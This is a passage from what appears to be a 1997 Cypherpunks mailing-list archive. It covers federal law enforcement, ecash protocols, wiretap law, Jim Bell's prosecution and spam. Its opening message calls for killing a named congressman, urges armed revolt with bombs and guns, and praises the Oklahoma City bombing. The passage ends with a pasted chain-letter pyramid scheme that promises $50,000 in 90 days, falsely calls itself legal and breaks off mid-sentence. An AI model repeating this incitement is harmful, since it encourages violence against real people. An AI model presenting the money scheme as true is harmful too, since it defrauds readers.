arrests, and/or carry firearms >"if necessary." If necessary is another double-talk bullshit term meaning carry weapons dangerous to freedom-loving citizens everywhere. >But that number is not complete. When some 7,145 Customs inspectors and 317 >Customs Department pilots are added -- all of whom have the above listed >law enforcement powers -- the total is pushing 60,000. Why doesn't the GAO >count them? Not because they aren't armed and dangerous, but because they >have different retirement benefits. And some beaureacratic bullshit along with Fascism. >Also, a GAO staff consultant explained that the report doesn't include >contract personnel or personnel from agencies with less than 25 officials >in law enforcement -- which is why some agencies, the Federal Emergency >Management Agency, for example, aren't on the list. > >The recent GAO report is the third and final in a series requested by Rep. >Bill McCollum, R-Florida, chairman of the House Subcommittee on Crime, to >gather information on agencies charged with investigating violations of >federal law. Someone PLEASE bump off Bill McHitler. He's the same jackass that was proposing the "Dangerous Predators" bill jailing kids with adults. >An earlier report, released last year and presenting figures through Sept. >30, 1995, dealt with the 13 biggest agencies -- those with 700 or more >investigative personnel. Not surprisingly, the FBI topped the list with >over 10,000 agents, followed by the INS, Drug Enforcement Administration, >and the U.S. Marshalls Service -- all in the Department of Justice. >Treasury agencies follow -- the Internal Revenue Service, U.S. Secret >Service, Customs, BATF and the Postal Inspection Service. Then the National >Park Service, U.S. Capitol Police, the Naval Criminal Investigative Service >and the Bureau of Diplomatic Security in the State Department. Why not go ahead and just for ministries of Peace, Truth, Plenty? >The final report deals with the 32 agencies that employ about 9 percent of >the law enforcement personnel. It's among these 32 that you'll find the >U.S. Fish and Wildlife, EPA's Office of Criminal Enforcement, Forensics and >Training, the Bureau of Land Management's Law Enforcement division and >other law enforcement bodies not usually traditionally with guns. > >Yet, the proliferation of firearms is even greater in these agencies: from >a total of 2,471 law enforcement employees in 1987 to 4,204 as of Sept. 30 >last year, a 70 percent increase. It's time we the people started doing the same. >But beyond the flat figures loom questions of how agencies are using, or >abusing, the powers they have in everyday law enforcement. Sting operations >and other entrapment tactics, hidden-camera surveillance, phone tapping -- Don't forget interrogation beatings, and illegal search and seizures. >these have become commonplace practices in the name of investigation. So, >too, has the use of dynamic entry teams -- the kind witnessed at Waco and >Ruby Ridge. And they wonder why the Davidians were armed to the teeth. >David Kopel, director of the free-market Independence Institute in Golden, >Colorado, is an outspoken critic of the usurpation of local and state >police authority by the federal government and the growing use of violence >in law enforcement. According to Kopel, the FBI has 56 SWAT teams that >"specialize in confrontation rather than investigation, even though >investigation is, after all, the very purpose of the bureau." Also purposes include fighting strong crypto among citizens, and threatening makers of crypto. >"Whereas (J. Edgar) Hoover's agents wore suits and typically had a >background in law or accounting, SWAT teams wear camouflage or black ninja >clothing and come from a military background," he said. "They are trained >killers, not trained investigators." That's why we need to have MORE citizen militias then EVER. >Even worse, other agencies are trying to match "FBI swashbucklers." BATF, >DEA, U.S. Marshalls Service, even the National Park Service and Department >of Health and Human Services -- all have their own SWAT teams. If I start seeing postal agencies with swat teams I'm joining a militia. >Contacted by telephone, Kopel said he was "not shocked " at the growing >size of the community of federal law enforcement personnel as reported by >the GAO, "in light of the trends over the past 20 years." "Of course," he >added, "it would have astonished and frightened the authors of our >Constitution." As I said, Nazi Fascism, and usurping of freedom. >"There's a continuing imperative (for an agency) to get power, and they'll >come back again and again until they get it," says Eric Sterling, president >of the Washington-based Criminal Justice Policy Foundation and a counsel >for the House Judiciary Committee in the 1980s. Sterling, who describes >himself as a liberal, is particularly alarmed by the arming of agencies >with military weapons, such as machine-guns. I'm increasingly astonished at the rate we citizens lose military weapons. >"The machine-gun is an indiscriminate weapon, and is singularly >inappropriate for the FBI and other agencies," he said. "Its use by a >government agency is a horrifying prospect." Yes, horrifying that soon it will lead to Dictatorship. >In full agreement is Greg Lojein, legislative counsel for the American >Civil Liberties Union. He deplores not only the expansion of the federal >law enforcement, but the lack of constraining mechanisms. There is a constraining mechanism, bombs and military rifles in the hands of citizens. >"Local police are subjected to review (by civilian boards), but not federal >agents," he noted. "When the Department of Justice investigates (an agency >incident), the results are not nearly as trustworthy as when an independent >entity investigates. Just ask Richard Jewell about this." Well, the Feds are above the law anyway. >Lojein called attention not only to the procurement of military weapons >themselves, but to the acquisition of heavy equipment such as military >helicopters and tanks as well -- "heavy equipment," he said, "more >characteristic of war than of law enforcement." War against citizens. >"The last thing people want to see is a tank on a city street," he said. >"That's what you expect to see in Bosnia, but not in Boston." Time to see more bomb-throwing freedom fighters here in America. >Kopel sees the federalization of law enforcement and the growth of the FBI >as parts of a larger effort to establish a national police force. He cites >in particular the involvement of the FBI in local law enforcement. "Besides >traffic tickets, there aren't many crimes where the FBI isn't involved in >the prosecution," he said. Nazi Fascism at work. >Eventually, he predicts, federal law enforcement agencies will be merged >--beginning by moving the Treasury agencies under the control of the >Justice Department, as Al Gore has recommended. "But a separation of powers >is at least a small check on the movement towards total police power >consolidation and keeps them from going completely overboard," said Kopel. It's time to rebel. >Others are concerned that the militarization of the federal government has >already gone too far -- that once-benign agencies have been given >incentives to become armed and dangerous. Many citizens have been given the incentive to make themselves armed and VERY dangerous to fascism loving nazis like Clinton and Freeh. >The raid at Santa Cruz, for instance, wasn't the first for the Park >Service. It wasn't even the most horrific in terms of outcome. Just one >month after the Weaver debacle at Ruby Ridge, Malibu millionaire Donald >Scott was gunned down in his home in a mid-morning assault involving 14 >agencies, including NASA, Immigration and Naturalization Services and the >L.A. County Sheriff's Department. The alleged reason for the attack was >that Scott was suspected of growing marijuana. Obviously, a dangerous crime to society. >None was found. There, as at >Santa Cruz Island, the lead agency was the NPS; and there, too, the real >reason was to acquire Scott's estate for the Park Service. Stealing land from citizens for use by the rulers. I'm telling ya, it's FASCISM. >At Santa Cruz, the National Park Service had been trying to obtain the >6,500-acre ranch -- which covers 10 percent of the island. The Nature >Conservancy owns the other 90 percent. The three arrests occurred as the >National Park Service had obtained orders from Congress to seize the ranch. Seize it for what? The time has come for all people to revolt with weapons; bombs, guns, knives, and anything that can kill Fascist Nazis and their supporters. Aquire weapons, form militias, retake the country. It's time to reinstate Democracy. If this continues, we're going to see more Oklahoma Cities. Arm yourselves, arm your neighbors, arm freedom lovers. Fight Fascism. That is the ONLY answer. And they still wonder why McVeigh said "Enough!!!" FreedomMonger "There's something wrong when Ranger Rick gets and automatic weapon, and Federal agencies become blurred with the Military." From jamesd at echeque.com Sun Aug 17 13:39:38 1997 From: jamesd at echeque.com (James A. Donald) Date: Mon, 18 Aug 1997 04:39:38 +0800 Subject: FCPUNX:Getting ecash without an MTB account Message-ID: <199708172027.NAA14757@proxy3.ba.best.com> On Fri, 15 Aug 1997, Mike wrote: >> Are you referring to the receiver anonymous protocol? >> >> This is how I understand that protocol, >> >> Alice wants to receive e$1 from Bob. She creates a random number, blinds >> it, and gives the blinded number to Bob. He shows the number to the >> Mint, asking for a withdrawal of e$1 with a signature on this coin >> number. Bob gives the signed and still blinded coin to Alice. She >> unblinds it and spends it, end of story. At 10:24 AM 8/15/97 -0700, Alan wrote: > Actually the coin is intercepted and spent by Mallet. Alice gets pissed > at Bob because she feels cheated by him. Mallet cannot intercept the coin, because only Alice can unblind it. Mallet cannot provide Bob with a number blinded by him, rather than Alice, because Alice signed the blinded number >> I thought that in this scenario, Bob can spend the coin before he gives >> it to Alice, No he cannot, because only Alice can unblind the coin. > My understanding of the protocol is that the identity of the purchacer is > revealed only if the coin is double spent. The identity of Bob is known by Alice and the bank. No one can ever discover the identity of Alice from the coin. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From rah at shipwright.com Sun Aug 17 13:59:57 1997 From: rah at shipwright.com (Robert Hettinga) Date: Mon, 18 Aug 1997 04:59:57 +0800 Subject: Wireless Week: CALEA Action Moves Backstage 8/18/97 Message-ID: --- begin forwarded text Subject: Wireless Week: CALEA Action Moves Backstage 8/18/97 http://www.wirelessweek.com/News/Aug97/two818.shtml Content-Type: text/html; charset=us-ascii; name="two818.shtml" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="two818.shtml" Content-Base: "http://www.wirelessweek.com/News/Aug97 /two818.shtml" >From the August 18, 1997 issue of Wireless Week CALEA Action Moves Backstage By Edward Warner WASHINGTON--The Department of Justice called off an industry-FBI meeting on the 1994 digital wiretap law. However, sources say the parties involved are trying to resolve their conflicts and will meet later this month. Last week's meeting was to involve CEOs of wireless carriers, their trade groups and both Attorney General Janet Reno and FBI Director Louis Freeh. Sources said the industry asked DOJ to postpone the meeting. One source said backstage discussions are now under way between the two sides and may produce a proposed solution if adequate time is allowed. Another carrier source said that due to summer holidays, too few CEOs from wireless carriers were expected to attend. The executives, many of whom have little hands-on experience with the Communications Assistance to Law Enforcement Act, couldn't be brought up to speed with such short notice. The Cellular Telecommunications Industry Association earlier this month asked the FCC to resolve the dispute because all carriers must comply with the law by October 1998, and no standard is available. Reacting to the FCC's request, Daniel Phythyon, head of the FCC's Wireless Telecommunications Bureau, said there's "already an intricate process" under way between the two sides. He could not say whether the FCC would respond to CTIA's request. The request was seconded last week in a joint petition filed by the two civil liberties groups that focus on technology issues. Those groups, the Center for Democracy and Technology and the Electronic Frontier Foundation, said jointly that the FBI is trying to acquire extra legal wiretap powers. Congress asked the industry to determine what new network functions carriers must offer to comply with CALEA. However, the FBI is fighting the proposed industry-supported functions. In the petition, the EFF and the CDT said that much of what the FBI wants is impermissible. For instance, the FBI previously requested that it be able to track mobile phones, even when they're not being used. This, the two groups said in a statement, "would effectively turn the cellular network into a nationwide, real-time location tracking system." CALEA compliance also is costly and makes the carriers susceptible to invasion of privacy lawsuits, CTIA President and CEO Tom Wheeler said. Wheeler, who was out of the country last week, has been a key force pressing for the meeting. | Who We Are | Search Archive | Hot Story Library | Wireless Web Sites | Calendar | Subscription Information | Classified Ads | Advertising Info | Return to Wireless Week Home Page Please send comments and suggestions on this Website to jcollins at chilton.net Wireless Week, 600 S. Cherry St., #400, Denver, CO 80222 Voice: 303-393-7449, Fax: 303-399-2034 Published by Chilton, An ABC Owned Company � Copyright 1997. All rights reserved. --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com), Philodox e$, 44 Farquhar Street, Boston, MA 02131 USA "... however it may deserve respect for its usefulness and antiquity, [predicting the end of the world] has not been found agreeable to experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire' The e$ Home Page: http://www.shipwright.com/ From dformosa at st.nepean.uws.edu.au Sun Aug 17 14:20:45 1997 From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa}) Date: Mon, 18 Aug 1997 05:20:45 +0800 Subject: Picketing With Packets In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Sat, 16 Aug 1997, Dr.Dimitri Vulis KOTM wrote: [...] > In all fairness, in addition to Stanford Wallace, there are several > other spammers sending out junk e-mail. If you completely eliminate > Stanford and his company, you will STILL get junk e-mail. Of cause this is true, but he is one of the beggest and thus gets the most attention. If we can stop him we cut down alot of email spam and we can move on the smaller one. Its like optimising code, you find where its taken most of its time and you optimise that. > Perhaps this will spark another round of a cypherpunk discussion of > technical solutions to junk e-mail... Hopefully, the spammers are just as effective censors as the goverment is IMHO. > I placed myself on a zillion "remove" lists. Now I no longer get any > junk e-mail of interest (which I did on rare occasions), I'm haveing trubble parsing this message, do you mean that you are not getting any junk e-mail that you are interested in? > but still get at least once a day an MMF I think this is a diffrent class of posting. Thouse peaple who post MMF do it from ignorence and stupidity, while this dosn't make what thay have done any less harmfull, it means that it has to be fixxed in a diffrent way to normal UCE. - -- Please excuse my spelling as I suffer from agraphia see the url in my header. Never trust a country with more peaple then sheep. ex-net.scum and proud You Say To People "Throw Off Your Chains" And They Make New Chains For Themselves? --Terry Pratchett -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBM/ctg6QK0ynCmdStAQGVDAQAhHkKWZs0Mxnqs0OEcZ71x8mxZaJSCaYq ZYu3UU6jH91+Qg1s+Cl2q/t+YF4RQIId0rX1irqVx+Cp80fQKYDJrTDXD3ptwa9B 2p8zDouF08yuzKvhrC9gC2JbgB4AzYmbAYyQ4KrjuPxuEEOd8omQKYFdkhHnZ6/W FfR/djktv4E= =8rv9 -----END PGP SIGNATURE----- From jya at pipeline.com Sun Aug 17 15:30:27 1997 From: jya at pipeline.com (John Young) Date: Mon, 18 Aug 1997 06:30:27 +0800 Subject: Ames Criminal Complaint Message-ID: <1.5.4.32.19970817221142.006eff34@pop.pipeline.com> We've put the 39-page criminal complaint against Aldrich Ames and Rosario Ames, with arrest warrant and requests for search and seizure at: http://jya.com/ames.htm (93K) Which may be compared to those of Jim Bell, in order, as Bob Hettinga merrily portends, to ready us to ponder each our own upcoming toilet plunge. Too bad that Jim didn't get (or hasn't yet gotten) the kind of swell-solitary-cell Rick and Rosario briefly enjoyed for CIA toilet diving (a la Trainspotting). From blancw at cnw.com Sun Aug 17 15:34:33 1997 From: blancw at cnw.com (Blanc) Date: Mon, 18 Aug 1997 06:34:33 +0800 Subject: Canarypunk: Jim Bell in a coalmine Message-ID: <3.0.32.19970817151550.00a36d98@cnw.com> >From Robert Hettinga: >Well, if he's still in there, and Vince Cate is up for it, we can probably >give you a scholarship, which, for FC98, means we let you in the door free. [.....] Mostly it's to show that I, and maybe Vince, if >not the rest of the FC++ organization, realize that there, for the grace of >the net, go us, too, someday, if we don't do something to show that people >like Jim Bell, however loony or repugnant their ideas are to us personally, >are not alone. ........................................................................ I was kidding, but that's awful nice of you, even if I still must pay for the rest of it. Yes, I'll still go visit JimBob - I'll have to find out about his location, hours, etc. Again, if any of you in this area would like to make the trip or meet there, perhaps meeting later as well for dinner and scholaryly discussion on the perils of free speech and such, please let me know. .. Blanc .. Blanc From azur at netcom.com Sun Aug 17 16:15:13 1997 From: azur at netcom.com (Steve Schear) Date: Mon, 18 Aug 1997 07:15:13 +0800 Subject: FCPUNX:Getting ecash without an MTB account In-Reply-To: <199708172027.NAA14757@proxy3.ba.best.com> Message-ID: >> My understanding of the protocol is that the identity of the purchacer is >> revealed only if the coin is double spent. > >The identity of Bob is known by Alice and the bank. Bob's identity is only known by Alice if other aspects of their transaction reveal it. Ecash payments can be made out to "@", a wild-card ID which allows anyone to spend it. TCP/IP payments only provide the IP address not the payee identity. Payments made via message pools further obscure identity. Once MoneyChanger front-ends to the mints are available Bob can remain anonymous to the bank as well. >No one can ever discover the identity of Alice from the coin. Unless the payment characteristics, e.g., large coin values, permit linkage. --Steve From mnorton at cavern.uark.edu Sun Aug 17 17:23:42 1997 From: mnorton at cavern.uark.edu (Mac Norton) Date: Mon, 18 Aug 1997 08:23:42 +0800 Subject: Canarypunk: Jim Bell in a coalmine In-Reply-To: <3.0.32.19970817151550.00a36d98@cnw.com> Message-ID: you might consider a webpage that reports on visits, status, and so forth. I've always thought his AP stuff silly, but I can't help but think it had somethng to do with his arrest and his prosecution. Perhaps the govt doesn't have a good silliness filter. MacN On Sun, 17 Aug 1997, Blanc wrote: > >From Robert Hettinga: > > >Well, if he's still in there, and Vince Cate is up for it, we can probably > >give you a scholarship, which, for FC98, means we let you in the door free. > [.....] Mostly it's to show that I, and maybe Vince, if > >not the rest of the FC++ organization, realize that there, for the grace of > >the net, go us, too, someday, if we don't do something to show that people > >like Jim Bell, however loony or repugnant their ideas are to us personally, > >are not alone. > ........................................................................ > > I was kidding, but that's awful nice of you, even if I still must pay for > the rest of it. Yes, I'll still go visit JimBob - I'll have to find out > about his location, hours, etc. Again, if any of you in this area would > like to make the trip or meet there, perhaps meeting later as well for > dinner and scholaryly discussion on the perils of free speech and such, > please let me know. > > .. > Blanc > .. > Blanc > > From jya at pipeline.com Sun Aug 17 17:56:21 1997 From: jya at pipeline.com (John Young) Date: Mon, 18 Aug 1997 08:56:21 +0800 Subject: Canarypunk: Jim Bell in a coalmine Message-ID: <1.5.4.32.19970817234925.00735e04@pop.pipeline.com> >From the Privacy Act Online via GPO Access [wais.access.gpo.gov] [DOCID:tres_irs-99] DEPARTMENT OF TREASURY Treasury/IRS 60.001 System name: Assault and Threat Investigation Files, Inspection--Treasury/IRS. System location: Office of the Chief Inspector, National Office; Regional Inspectors' Offices; as well as offices of the District Directors. (See IRS appendix A for addresses.) Categories of individuals covered by the system: Individuals attempting to interfere with the administration of Internal Revenue laws through threats, assaults or forcible interference of any officer or employee while discharging the official duties of his position, or individuals classified as potentially dangerous taxpayers, based on verifiable evidence or information that fit the following criteria: (1) Taxpayers who physically assault an employee; (2) taxpayers who have on hand a deadly or dangerous weapon when meeting with an employee and it is apparent their purpose is to intimidate the employee; (3) taxpayers who make specific threats to do bodily harm to an employee; (4) taxpayers who use animals to threaten or intimidate an employee; (5) taxpayers who have committed the acts set forth in any of the above criteria (1) through (4), but whose acts have been directed against employees of other governmental agencies at Federal, state, county, or local levels; (6) taxpayers who are not classifiable as potentially dangerous through application of the above criteria (1) through (5), but who have demonstrated a clear propensity toward violence through acts of violent behavior to a serious and extreme degree within the five (5) year period immediately preceding the time of classification as potentially dangerous; and (7) persons who are active members in chapters of tax protest groups that advocate violence against IRS employees. ... From kelly at count04.mry.scruznet.com Sun Aug 17 19:29:50 1997 From: kelly at count04.mry.scruznet.com (kelly) Date: Mon, 18 Aug 1997 10:29:50 +0800 Subject: New use for Eternity Server Message-ID: <33F7ABE9.1820A4D1@count04.mry.scruznet.com> Maybe someone should feed the pgp 5.0i sources to a c to HTML converter and post the output to the eternity servers.. mmm From nobody at REPLAY.COM Sun Aug 17 19:51:23 1997 From: nobody at REPLAY.COM (Anonymous) Date: Mon, 18 Aug 1997 10:51:23 +0800 Subject: Nothing Accumulation Separation All Message-ID: <199708180209.EAA24674@basement.replay.com> Thee InterNet is not a collection of machines, but a social relation among people, mediated by *nothing*. Thee InterNet is capital to such a degree of *accumulation* that it becomes a machine. Thee InterNet which eliminates all geographical distance reproduces distance internally as spectacular *separation*. InterNet theory is now the enemy of *all* InterNet ideology and knows it. From amp at pobox.com Sun Aug 17 20:52:40 1997 From: amp at pobox.com (amp at pobox.com) Date: Mon, 18 Aug 1997 11:52:40 +0800 Subject: Fw: Re: (Fwd) FWD: Texas Driver's License database on the web In-Reply-To: Message-ID: > There was an article in the WSJ about this recently, TX has passed a law > that goes into effect Sept. 1ST that will make publiclink illegal, they > said they would continue to run the site and see what happens in court. > Don't remember the date of the article. I yelled about this as loud as I could to every state rep and senator I could find when I first heard about this site a few months ago. The point that the scum at the texas dept of safety(hows that for orwellian in this case) are the ones selling the databases. It is so typical for the state to make a law prohibiting someone else to do that which they are doing themselves. The solution I gave them was to simply stop selling the information, and the situation would resolve itself. So fucking typical of government in general. How can they even wonder why so many people hate them so? ---------------End of Original Message----------------- ------------------------ Name: amp E-mail: amp at pobox.com Date: 08/17/97 Time: 22:32:19 Visit me at http://www.pobox.com/~amp 'Drug Trafficking Offense' is the root passphrase to the Constitution. Have you seen http://www.public-action.com/SkyWriter/WacoMuseum ------------------------ From gbroiles at netbox.com Sun Aug 17 21:13:32 1997 From: gbroiles at netbox.com (Greg Broiles) Date: Mon, 18 Aug 1997 12:13:32 +0800 Subject: Canarypunk: Jim Bell in a coalmine In-Reply-To: Message-ID: <3.0.2.32.19970817210628.006de130@pop.sirius.com> >Okay. So we know that Bell has pled, and he's in there for a while. > >How long until he gets out, now? > >Has he moved to another facility? > >Is all this moot because he's admitting to something which is not related >to his activities on this list? If I remember, his A/P rant here was still >pretty central to the Feds' case, right? As far as I can tell from what I've read on the list, Jim has plead guilty but will not be sentenced until sometime in October. (November?) In the interim period, he'll be interviewed pretty extensively by a federal probation officer, who will prepare a presentencing report which discusses Jim's attitude(s), prior conviction(s), drug/alcohol use, family status/influences, work history, etc. The presentence report is supposed to provide a context (for better or worse) into which the conviction(s) and sentence are placed. Jim and his attorney are supposed to get a chance to review the presentence report and object to it or supplement it before sentencing. This is a part of the process where it's possible that Jim is about to get screwed, because in large part this is one big litmus test re "bad attitude" (towards authority), which Jim had at one time, and quite possibly still has. The sentence he recieves will depend upon the federal sentencing guidelines; the guidelines will provide a range of months for incarceration and/or probation, depending on the offense level of the crime(s) he plead to and his criminal history (which appears to be relatively minimal, e.g., a previous guilty plea re possession of a precursor to methamphetamine). It's difficult to guess what his final offense level will be (and hence guess what range the judge will have to work with) because it depends on the amount of taxes he evaded. The sentence is determined by the judge, and should be within the range(s) specified by the sentencing guidelines, unless the judge has a reason to depart (which can be "upward" = more time, or "downward" = less time) from the guidelines; there are a number of adjustments to the offense level for things like weapon use, acceptance of responsibility, etc. The judge is only allowed to depart from the range specified if there are aggravating/mitigating factors which aren't covered by the pre-existing adjustments. More information about the sentencing guidelines is available at . His political/economic ideas aren't relevant/important to the crimes he plead to, although I personally suspect that they've got a lot to do with the decision to investigate and prosecute him. -- Greg Broiles | US crypto export control policy in a nutshell: gbroiles at netbox.com | http://www.io.com/~gbroiles | Export jobs, not crypto. | From Fredric_Olsson at hotmail.com Mon Aug 18 13:18:08 1997 From: Fredric_Olsson at hotmail.com (Fredric_Olsson at hotmail.com) Date: Mon, 18 Aug 1997 13:18:08 -0700 (PDT) Subject: Earn money fast and legal Message-ID: <> Dear friend, Please read the following information. The income opportunity is one you may be interested in. I am just an average person with basic computer knowledge and it has worked for me. It can be started with VERY MINIMAL outlay and the income return is TREMENDOUS! Please print this message and read it over twice. You will not regret it, I sure haven't! You will not receive another message from me, so there is no need to remove yourself from any list if you are not interested. I expect, however, you will be! $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ You are about to make at least $50,000 - In less than 90 days Read the enclosed program...THEN READ IT AGAIN!... $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ THIS IS A LEGITIMATE and LEGAL money making opportunity. It does not require you to come into contact with people, do any hard work, and best of all, you never have to leave your house except to get the mail. If you believe that someday you'll get that big break, you may wait forever unless you act. This is a chance to act, and it will work. Simply follow the instructions and you will make a handsome profit for the few hours involved. Multi-level marketing (MLM) has gained national respectability. It is being taught at Harvard Business School and both Stanford Research and the Wall Street Journal have stated that between 50% and 65% of all goods and services will be sold through multi-level marketing by the late 1990s. This is a Billion-dollar industry and the of the 500,000 millionaires in the United States, 20% (100,000) have made their fortune in the last several years using MLM. Moreover, statistics show that approximately 45 people become millionaires each day through Multi-level marketing. -------------------------------------------------------------------------- The enclosed information is something I almost let slip through my fingers. Fortunately, sometime later I re-read everything and gave some thought and study to it. My name is Christopher Erickson. Two years ago, the corporation I worked at for the past twelve years down-sized and my position was eliminated. After unproductive job interviews, I decided to open my own business. Over the past year, I incurred many unforeseen financial problems. I owed my family, friends, and creditors over $35,000. The economy was taking a toll on my business and I just couldn't seem to make ends meet. I had to refinance and borrow against my home to support my family and struggling business. I truly believe it was wrong for me to be in debt like this. AT THAT MOMENT something significant happened in my life and I am writing to share my experience in hopes that this will change your life FOREVER....FINANCIALLY!!! In mid-December, I received this program via email. Six months prior to receiving this program I had been sending away for information on various business opportunities. All of the programs I received, in my opinion, were not cost effective. They were either too difficult for me to comprehend or the initial investment was too much for me to risk to see if they worked or not. One claimed I'd make a million dollars in one year...it didn't tell me I'd have to write a book to make it. But like I was saying, in December of '95 I received this program. I didn't send for it, or ask for it, they just got my name off a mailing list. THANK GOODNESS FOR THAT!!! After reading it several times, to make sure I was reading it correctly, I couldn't believe my eyes. Here was a MONEY-MAKING PHENOMENON. I could invest as much as I wanted to start, without putting me further in debt. After I got a pencil and paper and figured it out, I would at least get my money back. After determining that the program is LEGAL and NOT A CHAIN LETTER, I decided "WHY NOT". Initially I sent out 10,000 emails. It only cost me about $15.00 for my time on-line. The great thing about email is that I didn't need any money for printing to send out the program, only the cost to fulfill my orders. I am telling you like it is, I hope it doesn't turn you off, but I promised myself that I would not "rip-off" anyone, no matter how much money it cost me! (A good program to help do this is Stealth Mass Mailer, an email extracting and mass mail program which can be found @ http://www.mitent.com/stealth.html. Shop around, you may be able to find a better deal.) In less than one week, I was starting to receive orders for REPORT #1. By January 13th, I had received 26 orders for REPORT #1. When you read the GUARANTEE in the program, you will see that "YOU MUST RECEIVE 15 TO 20 ORDERS FOR REPORT #1 WITHIN TWO WEEKS. IF YOU DON'T, SEND OUT MORE PROGRAMS UNTIL YOU DO!" My first step in making $50,000 in 20 to 90 days was done. By January 30th, I had received 196 orders for REPORT #2. If you go back to the GUARANTEE, "YOU MUST RECEIVE 100 OR MORE ORDERS FOR REPORT #2 WITHIN TWO WEEKS. IF NOT, SEND OUT MORE PROGRAMS UNTIL YOU DO. ONCE YOU HAVE 100 ORDERS, THE REST IS EASY, RELAX, YOU WILL MAKE YOUR $50,000 GOAL." Well, I had 196 orders for REPORT #2, 96 more than I needed. So I sat back and relaxed. By March 19th, of my emailing of 10,000, I received $58,000 with more coming in every day. I paid off ALL my debts and bought a much needed new car. Please take time to read the attached program, IT WILL CHANGE YOUR LIFE FOREVER! Remember, it wont work if you don't try it. This program does work, but you must follow it EXACTLY! Especially the rules of not trying to place your name in a different place. It doesn't work, you'll lose out on a lot of money! REPORT #2 explains this. Always follow the guarantee, 15 to 20 orders for REPORT #1, and 100 or more orders for REPORT #2 and you will make $50,000 or more in 20 to 90 days. I AM LIVING PROOF THAT IT WORKS !!! If you choose not to participate in this program, I'm sorry. It really is a great opportunity with little cost or risk to you. If you choose to participate, follow the program and you will be on your way to financial security. If you are a fellow business owner and you are in financial trouble like I was, or you want to start your own business, consider this a sign. I DID! Sincerely, Christopher Erickson P.S. Do you have any idea what 11,700 $5 bills ($58,000) look like piled up on a kitchen table? IT'S AWESOME! --------------------------------------------------------------------------- --------------------------------------- A NOTE FROM THE ORIGINATOR OF THIS PROGRAM By the time you have read the enclosed information and looked over the enclosed program and reports, you should have concluded that such a program, and one that is legal, could not have been created by an amateur. Let me tell you a little about myself. I had a profitable business for ten years. Then in 1979 my business began falling off. I was doing the same things that were previously successful for me, but it wasn't working. Finally, I figured it out. It wasn't me, it was the economy. Inflation and recession had replaced the stable economy that had been with us since 1945. I don't have to tell you what happened to the unemployment rate...because many of you know from first hand experience. There were more failures and bankruptcies than ever before. The middle class was vanishing. Those who knew what they were doing invested wisely and moved up. Those who did not, including those who never had anything to save or invest, were moving down into the ranks of the poor. As the saying goes, "THE RICH GET RICHER AND THE POOR GET POORER." The traditional methods of making money will never allow you to "move up" or "get rich", inflation will see to that. You have just received information that can give you financial freedom for the rest of your life, with "NO RISK" and "JUST A LITTLE BIT OF EFFORT." You can make more money in the next few months than you have ever imagined. I should also point out that I will not see a penny of your money, nor anyone else who has provided a testimonial for this program. I have already made over FOUR MILLION DOLLARS! I have retired from the program after sending out over 16,000 programs. Now I have several offices which market this and several other programs here in the US and overseas. By the Spring, we wish to market the 'Internet' by a partnership with AMERICA ONLINE. Follow the program EXACTLY AS INSTRUCTED. Do not change it in any way. It works exceedingly well as it is now. Remember to email a copy of this exciting program to everyone that you can think of. One of the people you send this to may send out 50,000...and your name will be on every one of them!. Remember though, the more you send out, the more potential customers you will reach. So my friend, I have given you the ideas, information, materials and opportunity to become financially independent, IT IS UP TO YOU NOW! THINK ABOUT IT ! Before you delete this program from your mailbox, as I almost did, take a little time to read it and REALLY THINK ABOUT IT. Get a pencil and figure out what could happen when YOU participate. Figure out the worst possible response and no matter how you calculate it, you will still make a lot of money! Definitely get back what you invested. Any doubts you have will vanish when your first orders come in. IT WORKS! Paul Johnson, Raleigh, NC HERE'S HOW THIS AMAZING PROGRAM WILL MAKE YOU $$$$$$ Let's say that you decide to start small, just to see how it goes, and we'll assume you and all those involved send out 2,000 programs each. Let's also assume that the mailing receives a .5% response. Using a good list the response could be much better. Also many people will send out hundreds of thousands of programs instead of 2,000. But continuing with this example, you send out only 2,000 programs. With a 5% response, that is only 10 orders for REPORT #1. Those 10 people respond by sending out 2,000 programs each for a total of 20,000. Out of those .5%, 100 people respond and order REPORT #2. Those 100 mail out 2,000 programs each for a total of 200,000. The .5% response to that is 1,000 orders for REPORT #3. Those 1,000 send out 2,000 programs each for a 2,000,000 total. The .5% response to that is 10,000 orders for REPORT #4. That's 10,000 five dollar bills for you. CASH!!!! Your total income in this example is $50 + $500 + $5000 + $50,000 for a total of $55,550!!!! REMEMBER FRIEND, THIS IS ASSUMING 1,990 OUT OF 2,000 PEOPLE YOU MAIL TO WILL DO ABSOLUTELY NOTHING... AND TRASH THIS PROGRAM! DARE TO THINK FOR A MOMENT WHAT WOULD HAPPEN IF EVERYONE OR HALF SENT OUT 100,000 PROGRAMS INSTEAD OF ONLY 2,000. Believe me, many people will do that and more! By the way, your cost to participate in this is practically nothing. You obviously already have an Internet connection and email is FREE!!! REPORT #3 will show you the best methods for bulk emailing and purchasing email lists. THIS IS A LEGITIMATE, LEGAL, MONEY MAKING OPPORTUNITY. It does not require you to come in contact with people, do any hard work, and best of all, you never have to leave the house except to get the mail. If you believe that someday you'll get that big break that you've been waiting for, THIS IS IT! Simply follow the instructions, and your dream will come true. This multi-level email order marketing program works perfectly...100% EVERY TIME. Email is the sales tool of the future. Take advantage of this non-commercialized method of advertising NOW!! The longer you wait, the more people will be doing business using email. Get your piece of this action!! INSTRUCTIONS We at Erris Mail Order Marketing Business, have a method of raising capital that REALLY WORKS 100% EVERY TIME. I am sure that you could use $50,000 to $125,000 in the next 20 to 90 days. Before you say "Bull", please read the program carefully. This is not a chain letter, but a perfectly legal money making opportunity. Basically, this is what we do: As with all multi-level business, we build our business by recruiting new partners and selling our products. Every state in the USA allows you to recruit new multi- level business partners, and we offer a product for EVERY dollar sent. YOUR ORDERS COME AND ARE FILLED THROUGH THE MAIL, so you are not involved in personal selling. You do it privately in your own home, store or office. This is the GREATEST Multi-level Mail Order Marketing anywhere: Step (1) Order all four 4 REPORTS listed by NAME AND NUMBER. Do this by ordering the 